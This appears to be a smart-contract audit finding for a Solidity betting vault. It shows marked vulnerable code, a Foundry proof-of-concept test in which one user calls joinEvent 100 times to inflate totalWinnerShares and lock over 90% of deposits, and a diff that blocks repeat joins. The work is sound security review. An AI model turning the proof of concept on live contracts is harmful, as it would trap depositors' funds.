function joinEvent(uint256 countryId) public {
if (stakedAsset[msg.sender] == 0) {
revert noDeposit();
}
if (countryId >= teams.length) {
revert invalidCountry();
}
if (block.timestamp > eventStartDate) {
revert eventStarted();
}
userToCountry[msg.sender] = teams[countryId];
uint256 participantShares = balanceOf(msg.sender);
@> userSharesToCountry[msg.sender][countryId] = participantShares;
@> usersAddress.push(msg.sender);
numberOfParticipants++;
totalParticipantShares += participantShares;
emit joinedEvent(msg.sender, countryId);
}
function _getWinnerShares () internal returns (uint256) {
@> for (uint256 i = 0; i < usersAddress.length; ++i){
address user = usersAddress[i];
@> totalWinnerShares += userSharesToCountry[user][winnerCountryId];
}
return totalWinnerShares;
}
function withdraw() external winnerSet {
uint256 shares = balanceOf(msg.sender);
uint256 vaultAsset = finalizedVaultAsset;
@> uint256 assetToWithdraw = Math.mulDiv(shares, vaultAsset, totalWinnerShares);
_burn(msg.sender, shares);
IERC20(asset()).safeTransfer(msg.sender, assetToWithdraw);
}
pragma solidity ^0.8.24;
import {Test, console} from "forge-std/Test.sol";
import {BriVault} from "../src/BriVault.sol";
import {ERC20Mock} from "@openzeppelin/contracts/mocks/token/ERC20Mock.sol";
contract MultipleJoinTest is Test {
BriVault public vault;
ERC20Mock public asset;
address public owner = makeAddr("owner");
address public feeAddress = makeAddr("feeAddress");
address public alice = makeAddr("alice");
address public bob = makeAddr("bob");
function setUp() public {
asset = new ERC20Mock();
vm.startPrank(owner);
vault = new BriVault(
asset,
300,
block.timestamp + 1 days,
feeAddress,
10 * 10**18,
block.timestamp + 30 days
);
string[48] memory countries;
countries[0] = "Team A";
vault.setCountry(countries);
vm.stopPrank();
asset.mint(alice, 1000 * 10**18);
asset.mint(bob, 1000 * 10**18);
vm.startPrank(alice);
asset.approve(address(vault), type(uint256).max);
vault.deposit(1000 * 10**18, alice);
vm.stopPrank();
vm.startPrank(bob);
asset.approve(address(vault), type(uint256).max);
vault.deposit(1000 * 10**18, bob);
vm.stopPrank();
}
function testMultipleJoinInflatesTotalWinnerShares() public {
vm.prank(bob);
vault.joinEvent(0);
vm.startPrank(alice);
for (uint256 i = 0; i < 100; i++) {
vault.joinEvent(0);
}
vm.stopPrank();
vm.warp(block.timestamp + 31 days);
vm.prank(owner);
vault.setWinner(0);
uint256 totalWinnerShares = vault.totalWinnerShares();
uint256 aliceShares = vault.balanceOf(alice);
uint256 bobShares = vault.balanceOf(bob);
uint256 vaultBalance = vault.finalizedVaultAsset();
assertGt(totalWinnerShares, aliceShares + bobShares, "totalWinnerShares inflated");
uint256 aliceExpectedPayout = (aliceShares * vaultBalance) / totalWinnerShares;
uint256 bobExpectedPayout = (bobShares * vaultBalance) / totalWinnerShares;
uint256 fairShare = vaultBalance / 2;
assertLt(aliceExpectedPayout, fairShare / 10, "Alice gets <10% of fair share");
assertLt(bobExpectedPayout, fairShare / 10, "Bob gets <10% of fair share");
vm.prank(alice);
vault.withdraw();
vm.prank(bob);
vault.withdraw();
uint256 remainingFunds = asset.balanceOf(address(vault));
assertGt(remainingFunds, vaultBalance * 90 / 100, "90%+ of funds locked");
}
}
+ mapping(address => bool) public hasJoined;
function joinEvent(uint256 countryId) public {
if (stakedAsset[msg.sender] == 0) {
revert noDeposit();
}
+ if (hasJoined[msg.sender]) {
+ revert("Already joined event");
+ }
if (countryId >= teams.length) {
revert invalidCountry();
}
if (block.timestamp > eventStartDate) {
revert eventStarted();
}
userToCountry[msg.sender] = teams[countryId];
uint256 participantShares = balanceOf(msg.sender);
userSharesToCountry[msg.sender][countryId] = participantShares;
usersAddress.push(msg.sender);
+ hasJoined[msg.sender] = true;
numberOfParticipants++;
totalParticipantShares += participantShares;
emit joinedEvent(msg.sender, countryId);
}